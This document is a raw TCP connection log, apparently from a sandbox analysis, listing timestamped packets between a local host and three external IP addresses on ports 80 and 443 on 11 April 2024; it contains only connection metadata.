Apr 11, 2024 11:32:56.478029013 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.478060007 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.478827953 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.478848934 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.478902102 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.478916883 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.478948116 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.479744911 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.479768038 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.479840994 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.479854107 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.479897022 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.480197906 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.480223894 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.480266094 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.480279922 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.480308056 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.481173992 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.481197119 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.481245041 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.481257915 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.481291056 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.481954098 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.481973886 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.482032061 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.482044935 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.482074022 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.483516932 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.483541965 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.483591080 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.483603954 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.483630896 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.484569073 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.484589100 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.484637022 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.484649897 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.484678030 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.485466003 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.485488892 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.485528946 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.485541105 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.485577106 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.486402988 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.486423016 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.486474037 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.486486912 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.486524105 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.487684011 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.487708092 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.487754107 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.487766981 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.487797976 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.488679886 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.488735914 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.488785982 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.488797903 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.488826036 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.489665985 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.489691973 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.489737034 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.489748955 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.489778042 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.490686893 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.490706921 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.490767956 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.490780115 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.490817070 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.494512081 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.494538069 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.494625092 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.494640112 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.494806051 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.494826078 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.494874001 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.494885921 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.494915009 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.495106936 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.495130062 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.495172024 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.495183945 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.495213032 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.496049881 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.496069908 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.496118069 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.496129990 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.496161938 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.497076035 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.497098923 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.497148991 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.497160912 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.497200966 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.498485088 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.498513937 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.498555899 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.498568058 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.498600006 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.498918056 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.498950005 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.498987913 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.499001026 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.499032021 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.499525070 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.499552965 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.499605894 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.499619007 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.499645948 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.500121117 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.500154018 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.500226021 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.500245094 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.500271082 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.501702070 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.501730919 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.501780033 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.501792908 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.501823902 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.502733946 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.502767086 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.502800941 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.502814054 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.502845049 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.503635883 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.503664970 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.503710985 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.503722906 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.503751040 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.505075932 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.505130053 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.505170107 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.505182981 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.505213976 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.505285025 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.505343914 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.513058901 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:33:19.978672981 CEST	49731	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:20.132034063 CEST	80	49731	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:20.132134914 CEST	49731	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:20.132493019 CEST	49731	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:20.285665989 CEST	80	49731	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:20.286756039 CEST	80	49731	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:20.291660070 CEST	49731	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:20.445918083 CEST	80	49731	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:20.490601063 CEST	49731	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:20.550561905 CEST	49732	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:20.550625086 CEST	443	49732	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:20.550698996 CEST	49732	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:20.555176020 CEST	49732	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:20.555208921 CEST	443	49732	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:20.746592045 CEST	443	49732	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:20.746679068 CEST	49732	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:20.748533010 CEST	49732	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:20.748545885 CEST	443	49732	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:20.749130964 CEST	443	49732	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:20.797919989 CEST	49732	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:20.840251923 CEST	443	49732	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:21.264049053 CEST	443	49732	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:21.264384985 CEST	443	49732	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:21.264460087 CEST	49732	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:21.268305063 CEST	49732	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:21.271359921 CEST	49731	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:21.428685904 CEST	80	49731	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:21.431521893 CEST	49734	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:21.431608915 CEST	443	49734	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:21.431710005 CEST	49734	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:21.431989908 CEST	49734	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:21.432028055 CEST	443	49734	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:21.474991083 CEST	49731	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:21.611730099 CEST	443	49734	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:21.620163918 CEST	49734	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:21.620194912 CEST	443	49734	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:21.825901985 CEST	443	49734	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:21.826129913 CEST	443	49734	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:21.826430082 CEST	49734	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:21.826776981 CEST	49734	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:21.841821909 CEST	49731	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:21.842914104 CEST	49735	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:21.995085001 CEST	80	49731	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:21.995315075 CEST	49731	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:21.996133089 CEST	80	49735	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:21.996222019 CEST	49735	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:21.996386051 CEST	49735	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:22.149677992 CEST	80	49735	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:22.151057959 CEST	80	49735	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:22.152338982 CEST	49736	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:22.152426004 CEST	443	49736	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:22.152514935 CEST	49736	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:22.152792931 CEST	49736	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:22.152826071 CEST	443	49736	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:22.193722963 CEST	49735	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:22.340672016 CEST	443	49736	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:22.341917038 CEST	49736	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:22.341952085 CEST	443	49736	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:22.557522058 CEST	443	49736	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:22.557804108 CEST	443	49736	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:22.558033943 CEST	49736	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:22.558279037 CEST	49736	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:22.561409950 CEST	49735	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:22.562562943 CEST	49737	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:22.717550039 CEST	80	49737	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:22.717901945 CEST	80	49735	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:22.718055010 CEST	49735	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:22.718090057 CEST	49737	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:22.718226910 CEST	49737	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:22.871501923 CEST	80	49737	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:23.379410982 CEST	80	49737	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:23.381143093 CEST	49738	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:23.381213903 CEST	443	49738	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:23.381350040 CEST	49738	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:23.381617069 CEST	49738	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:23.381644964 CEST	443	49738	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:23.428231001 CEST	49737	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:23.560668945 CEST	443	49738	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:23.562189102 CEST	49738	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:23.562269926 CEST	443	49738	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:23.774715900 CEST	443	49738	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:23.775012970 CEST	443	49738	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:23.775093079 CEST	49738	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:23.775521040 CEST	49738	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:23.780150890 CEST	49739	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:23.933423042 CEST	80	49739	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:23.933501005 CEST	49739	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:23.933660984 CEST	49739	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:24.087135077 CEST	80	49739	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:25.604667902 CEST	80	49739	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:25.606379032 CEST	49740	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:25.606463909 CEST	443	49740	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:25.606560946 CEST	49740	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:25.606914043 CEST	49740	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:25.606950998 CEST	443	49740	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:25.646990061 CEST	49739	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:25.789453983 CEST	443	49740	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:25.790994883 CEST	49740	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:25.791079044 CEST	443	49740	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:26.003833055 CEST	443	49740	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:26.004136086 CEST	443	49740	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:26.004318953 CEST	49740	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:27.127734900 CEST	49740	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:27.190514088 CEST	49739	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:27.191854000 CEST	49741	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:27.345010042 CEST	80	49741	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:27.345151901 CEST	49741	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:27.345308065 CEST	49741	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:27.352615118 CEST	80	49739	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:27.352809906 CEST	49739	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:27.498428106 CEST	80	49741	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:28.496920109 CEST	49742	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:28.650350094 CEST	80	49742	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:28.650547028 CEST	49742	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:28.650985956 CEST	49742	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:28.803968906 CEST	80	49742	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:31.539907932 CEST	80	49741	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:31.544312000 CEST	49743	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:31.544399023 CEST	443	49743	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:31.544509888 CEST	49743	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:31.544740915 CEST	49743	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:31.544784069 CEST	443	49743	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:31.584424019 CEST	49741	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:31.726592064 CEST	443	49743	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:31.728034019 CEST	49743	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:31.728074074 CEST	443	49743	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:31.941219091 CEST	443	49743	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:31.941494942 CEST	443	49743	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:31.941570997 CEST	49743	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:31.942059040 CEST	49743	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:31.947001934 CEST	49741	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:31.947757006 CEST	49744	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:32.101227999 CEST	80	49744	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:32.101476908 CEST	49744	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:32.101530075 CEST	49744	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:32.113074064 CEST	80	49741	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:32.113289118 CEST	49741	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:32.254686117 CEST	80	49744	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:33.819098949 CEST	80	49742	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:33.822393894 CEST	49742	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:33.975889921 CEST	80	49742	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:34.014940977 CEST	80	49742	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:34.024066925 CEST	49745	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:34.024099112 CEST	443	49745	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:34.024281979 CEST	49745	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:34.028500080 CEST	49745	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:34.028511047 CEST	443	49745	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:34.068749905 CEST	49742	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:34.210139036 CEST	443	49745	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:34.210227013 CEST	49745	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:34.211585045 CEST	49745	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:34.211589098 CEST	443	49745	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:34.212049007 CEST	443	49745	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:34.256230116 CEST	49745	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:34.259588957 CEST	49745	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:34.300239086 CEST	443	49745	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:34.431318045 CEST	443	49745	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:34.431592941 CEST	443	49745	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:34.431648016 CEST	49745	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:34.434943914 CEST	49745	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:34.438519001 CEST	49742	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:34.591506958 CEST	80	49742	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:34.643286943 CEST	80	49742	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:34.645895004 CEST	49746	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:34.645948887 CEST	443	49746	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:34.646121979 CEST	49746	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:34.646445036 CEST	49746	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:34.646456957 CEST	443	49746	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:34.693861008 CEST	49742	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:34.829025030 CEST	443	49746	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:34.830410957 CEST	49746	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:34.830446005 CEST	443	49746	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:35.042066097 CEST	443	49746	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:35.042325974 CEST	443	49746	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:35.042409897 CEST	49746	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:35.042741060 CEST	49746	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:35.045759916 CEST	49742	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:35.046894073 CEST	49747	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:35.200462103 CEST	80	49747	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:35.200576067 CEST	49747	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:35.200752020 CEST	49747	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:35.212337017 CEST	80	49742	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:35.212444067 CEST	49742	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:35.353931904 CEST	80	49747	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:39.719729900 CEST	80	49744	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:39.721085072 CEST	49748	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:39.721143961 CEST	443	49748	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:39.721241951 CEST	49748	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:39.721492052 CEST	49748	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:39.721525908 CEST	443	49748	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:39.771893024 CEST	49744	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:39.908490896 CEST	443	49748	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:39.909691095 CEST	49748	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:39.909729958 CEST	443	49748	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:40.121716976 CEST	443	49748	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:40.121943951 CEST	443	49748	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:40.122009993 CEST	49748	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:40.122463942 CEST	49748	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:40.125703096 CEST	49744	80	192.168.2.5	158.101.44.242
